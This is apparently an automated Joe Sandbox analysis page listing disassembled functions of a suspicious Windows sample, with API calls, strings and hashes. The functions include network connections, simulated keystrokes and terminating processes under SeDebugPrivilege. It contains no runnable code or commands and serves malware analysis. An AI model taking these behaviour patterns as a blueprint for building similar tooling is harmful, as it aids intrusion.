Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 976aca56ec42ade4b9af28f52184067dd6fa2702d297c447c438cac54afc8ba8
Instruction ID: addcce00360ddbdbce5815af0b10e0eb42fe6386c9f2a1c9461c66d9c5699970
Opcode Fuzzy Hash: 976aca56ec42ade4b9af28f52184067dd6fa2702d297c447c438cac54afc8ba8
Instruction Fuzzy Hash: EE519C70600209EFDB20CF25CC95FAA7BB5FB58750F10852EF90A972A0DB78E951DB58

Function 004DC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004DC182
GetLastError.KERNEL32 ref: 004DC195
SetEvent.KERNEL32(?), ref: 004DC1A9

Part of subcall function 004DC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004DC272
Part of subcall function 004DC253: GetLastError.KERNEL32 ref: 004DC322
Part of subcall function 004DC253: SetEvent.KERNEL32(?), ref: 004DC336
Part of subcall function 004DC253: InternetCloseHandle.WININET(00000000), ref: 004DC341

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 77071fb34bf1a97a2a85cd6bab8a5b30edc699f09636163d39abf4006cde7d52
Instruction ID: 3aefe9a0d3f6b4bcbfdd66a9c345a6fa991d7c339572fea8dcfc44bf08d481e6
Opcode Fuzzy Hash: 77071fb34bf1a97a2a85cd6bab8a5b30edc699f09636163d39abf4006cde7d52
Instruction Fuzzy Hash: 09318D71900606AFDB219FA59D94A77BBE9FF18300B10446FF95682710C734E815DBA8

Function 004C25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004C3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004C3A57
Part of subcall function 004C3A3D: GetCurrentThreadId.KERNEL32 ref: 004C3A5E
Part of subcall function 004C3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004C25B3), ref: 004C3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 004C25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004C25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004C25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 004C25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004C2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 004C2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 004C260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004C2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 004C2627

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 887d62987d1d6f45bad0374fd2ed60fd893af2c2177d0407b727a627fb4bb705
Instruction ID: fce942fd5c550d5b60aeaac9c78539cce80430be41f60f1133f6080cbbc46969
Opcode Fuzzy Hash: 887d62987d1d6f45bad0374fd2ed60fd893af2c2177d0407b727a627fb4bb705
Instruction Fuzzy Hash: 3B01D434394214BBFB106B699CCAF693F59DF4EB16F10001AF318AE0D1C9F26464CA6E

Function 004C1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,004C1449,?,?,00000000), ref: 004C180C
HeapAlloc.KERNEL32(00000000,?,004C1449,?,?,00000000), ref: 004C1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004C1449,?,?,00000000), ref: 004C1828
GetCurrentProcess.KERNEL32(?,00000000,?,004C1449,?,?,00000000), ref: 004C1830
DuplicateHandle.KERNEL32(00000000,?,004C1449,?,?,00000000), ref: 004C1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004C1449,?,?,00000000), ref: 004C1843
GetCurrentProcess.KERNEL32(004C1449,00000000,?,004C1449,?,?,00000000), ref: 004C184B
DuplicateHandle.KERNEL32(00000000,?,004C1449,?,?,00000000), ref: 004C184E
CreateThread.KERNEL32(00000000,00000000,004C1874,00000000,00000000,00000000), ref: 004C1868

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 981771f9d60f121d0089124ac22d38d6e4d769dc604abf2e3df7d718eb17d98e
Instruction ID: 3617fb7d42d7318068e2fc5e8bb8aac5534bae3e0b552077c9a295bca39570a8
Opcode Fuzzy Hash: 981771f9d60f121d0089124ac22d38d6e4d769dc604abf2e3df7d718eb17d98e
Instruction Fuzzy Hash: B001BF75240308BFE710AB65DE8DF673B6CEB89B11F004421FA05DB1A1C6749C20DF64

Function 004EA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 004CD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 004CD501
Part of subcall function 004CD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 004CD50F
Part of subcall function 004CD4DC: CloseHandle.KERNEL32(00000000), ref: 004CD5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 004EA16D
GetLastError.KERNEL32 ref: 004EA180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004EA1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 004EA268
GetLastError.KERNEL32(00000000), ref: 004EA273
CloseHandle.KERNEL32(00000000), ref: 004EA2C4

Strings

SeDebugPrivilege, xrefs: 004EA18F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 9a7cab47a998f9c21dd904e158a3e5604636c2e94445c2a2439683e42987ffd6
Instruction ID: 54dac53c9dc72c546b831bd10fce32e5ab36bc0d34af986de5d4e4b12c3052d5
Opcode Fuzzy Hash: 9a7cab47a998f9c21dd904e158a3e5604636c2e94445c2a2439683e42987ffd6
Instruction Fuzzy Hash: BA61BE302042829FD310DF16C494F26BBE1AF44318F18849EE5668B7A3C77AFC55CB9A

Function 004F3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004F3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004F393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004F3954
_wcslen.LIBCMT ref: 004F3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 004F39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 004F39F4

Strings

SysListView32, xrefs: 004F38F7

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 689ea95aa60285f34abdcecd132c54b16bbe7ab2803415a2f3336f8f51318420
Instruction ID: 884d2a750a1016786919eb7320658cda48cd22a6c7f71da5682d46e47f3b0131
Opcode Fuzzy Hash: 689ea95aa60285f34abdcecd132c54b16bbe7ab2803415a2f3336f8f51318420
Instruction Fuzzy Hash: 3B41B57190021DABEB219F64CC45FFB7BA9EF08354F10052AF654E7281D7B99D90CB98

Function 004CBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004CBCFD
IsMenu.USER32(00000000), ref: 004CBD1D
CreatePopupMenu.USER32 ref: 004CBD53
GetMenuItemCount.USER32(00FA7628), ref: 004CBDA4
InsertMenuItemW.USER32(00FA7628,?,00000001,00000030), ref: 004CBDCC

Strings

2, xrefs: 004CBD37
0, xrefs: 004CBCA8

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: fd5f084d1bf008aaf5e3b5d3a457e649ddc2129f487132a88b8a38a14b118ca1
Instruction ID: aab69a2a8a5031972948a9ae470fc342162273a88de2c1330eb7feeb6043e9c7
Opcode Fuzzy Hash: fd5f084d1bf008aaf5e3b5d3a457e649ddc2129f487132a88b8a38a14b118ca1
Instruction Fuzzy Hash: AB51F078A00209ABDB51CFA9C8C6FAEBBF8FF45314F14416EE40297390D7789941CB99

Function 00482D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00482D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00482D53
_ValidateLocalCookies.LIBCMT ref: 00482DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00482E0C
_ValidateLocalCookies.LIBCMT ref: 00482E61

Strings

csm, xrefs: 00482DF6
&HH, xrefs: 00482DFE, 00482E07, 00482E18

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &HH$csm
API String ID: 1170836740-2288278727
Opcode ID: 5bef933a88fd45f2802f751f00ada6523d79ab86f5e9718fe3121f71e4bd35d0
Instruction ID: ba730a8f98bbeef4719ace4173153435e7405c15a5976ab555e68120c8bbace1
Opcode Fuzzy Hash: 5bef933a88fd45f2802f751f00ada6523d79ab86f5e9718fe3121f71e4bd35d0
Instruction Fuzzy Hash: D741D434E002089BCF10FF69C944AAEBFF4BF44318F14885AE8146B392D7B99A05CB94

Function 004CC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004CC913

Strings

blank, xrefs: 004CC895
info, xrefs: 004CC8B4
warning, xrefs: 004CC8FC
question, xrefs: 004CC8CC
stop, xrefs: 004CC8E4

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: ac9dd7af499e558b766c7f6b629859daa03970646339add2ad890202837dab38
Instruction ID: cfcf5be65af888ce6acd6c6d53438db0557af467f29f875ffee356574b6c3aa0
Opcode Fuzzy Hash: ac9dd7af499e558b766c7f6b629859daa03970646339add2ad890202837dab38
Instruction Fuzzy Hash: 92112B7A789317BAA704AB15ACC2EAF27ACDF15359B10003FF508A62C2D7789D0053AD

Function 004CED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 004CED2A
_wcslen.LIBCMT ref: 004CED3B
_wcslen.LIBCMT ref: 004CED79
_wcslen.LIBCMT ref: 004CEDAF
_wcslen.LIBCMT ref: 004CEDDF
_wcslen.LIBCMT ref: 004CEDEF
_wcslen.LIBCMT ref: 004CEE2B
_wcslen.LIBCMT ref: 004CEE5A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: cb67c25c86e4be479a73747f877fcd5a1d18dca5d027a0df82584647be2e1907
Instruction ID: bfda01e81e9e2ea96998753632708b84662be6bc2d48d7d0c7a02f08e6052e13
Opcode Fuzzy Hash: cb67c25c86e4be479a73747f877fcd5a1d18dca5d027a0df82584647be2e1907
Instruction Fuzzy Hash: AB41B665C1011976CB61FBF6888AECF77A8AF45310F5048ABE518E3162FB38D255C3AD

Function 0047F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004B682C,00000004,00000000,00000000), ref: 0047F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,004B682C,00000004,00000000,00000000), ref: 004BF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004B682C,00000004,00000000,00000000), ref: 004BF454

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 877d693e2d97cf438d01fc37c28b9a97dbb5fdabb6273beeb756a07b66a9a86a
Instruction ID: d93d49fabdf22311e8d18f2fa7d5c7ef868082ce50bf35168d33d238fd9ff0b7
Opcode Fuzzy Hash: 877d693e2d97cf438d01fc37c28b9a97dbb5fdabb6273beeb756a07b66a9a86a
Instruction Fuzzy Hash: 2A41E6F1108640BAC7349B2D8D887FB7A91AB55314F14C43FE24F56660D63DA88DCB29

Function 004F2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004F2D1B
GetDC.USER32(00000000), ref: 004F2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004F2D2E
ReleaseDC.USER32(00000000,00000000), ref: 004F2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 004F2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004F2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004F5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 004F2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004F2DE1

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 1f98f99e892427fb8e8ac8dba8f39306c4ddde6fe61ea5dc00be9ca2f6581120
Instruction ID: efe7c0e721369d780dc16c1477b93d5159d101fa7d4aa3fd55447eb7abbad9df
Opcode Fuzzy Hash: 1f98f99e892427fb8e8ac8dba8f39306c4ddde6fe61ea5dc00be9ca2f6581120
Instruction Fuzzy Hash: 91316D72201618BFEB118F50CD89FFB3BA9EF09755F044066FE08DA291C6B59C51CBA8

Function 004C5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 004C5637
_memcmp.LIBVCRUNTIME ref: 004C5659
_memcmp.LIBVCRUNTIME ref: 004C5671
_memcmp.LIBVCRUNTIME ref: 004C5684
_memcmp.LIBVCRUNTIME ref: 004C569E
_memcmp.LIBVCRUNTIME ref: 004C56B1
_memcmp.LIBVCRUNTIME ref: 004C56C9
_memcmp.LIBVCRUNTIME ref: 004C56E4

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: d9636f465031b210e774153257257d9786af732a2714bc15ec443a691910ede1
Instruction ID: 7de1a680e285cdc7f115850936dada402c1937395f1617d238bf6dc7830af201
Opcode Fuzzy Hash: d9636f465031b210e774153257257d9786af732a2714bc15ec443a691910ede1
Instruction Fuzzy Hash: DD212C6574191977E25565118D82FFF335CAF21388F54002FFE085AA41F72CFD9682AD

Function 004E4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 004E5007
NULL Pointer assignment, xrefs: 004E502E, 004E5383

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: ffc8ad476f6eff0ef04e0053ee700a2f167df35b8a862e14cc362ecc861ef133
Instruction ID: cdb49f3f63d2c9054a5e3551d2cd4deffe5ead76656dec3ba92965b51168b349
Opcode Fuzzy Hash: ffc8ad476f6eff0ef04e0053ee700a2f167df35b8a862e14cc362ecc861ef133
Instruction Fuzzy Hash: 73D1D371A0064A9FDF10CF9AC880BAEB7B5BF48348F14806AE915EB381D774DD45CB54

Function 004A1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,004A17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 004A15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004A17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004A1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,004A17FB,?,004A17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004A16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004A17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004A16FB

Part of subcall function 00493820: RtlAllocateHeap.NTDLL(00000000,?,00531444,?,0047FDF5,?,?,0046A976,00000010,00531440,004613FC,?,004613C6,?,00461129), ref: 00493852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004A17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004A1777
__freea.LIBCMT ref: 004A17A2
__freea.LIBCMT ref: 004A17AE

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 0b63717b0862fa8bd26d23344c34799a824a5ddd9e41ec36790da8b7a0d670e5
Instruction ID: f0ed05417f812fe844eeecb630a112dc263d0ff8d078f45cf0d5ddcb354d97ef
Opcode Fuzzy Hash: 0b63717b0862fa8bd26d23344c34799a824a5ddd9e41ec36790da8b7a0d670e5
Instruction Fuzzy Hash: F891B475E00216ABDF209E64C981EEF7BB59F66310F18456BE802E72A1D739CC41CB68

Function 004E4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004E4648
VariantInit.OLEAUT32(?), ref: 004E4749
VariantClear.OLEAUT32(?), ref: 004E4753
VariantClear.OLEAUT32(?), ref: 004E47B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 004E45D8, 004E4706, 004E47BE
Incorrect Object type in FOR..IN loop, xrefs: 004E472C

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 122c066f32b405406af978e9dcd06ad78f6ca12fc8423a15e2281930f3c050ed
Instruction ID: ecd9513619cd06abb149b97b20065af7d921bb12047121ccd0ad14a196d0663f
Opcode Fuzzy Hash: 122c066f32b405406af978e9dcd06ad78f6ca12fc8423a15e2281930f3c050ed
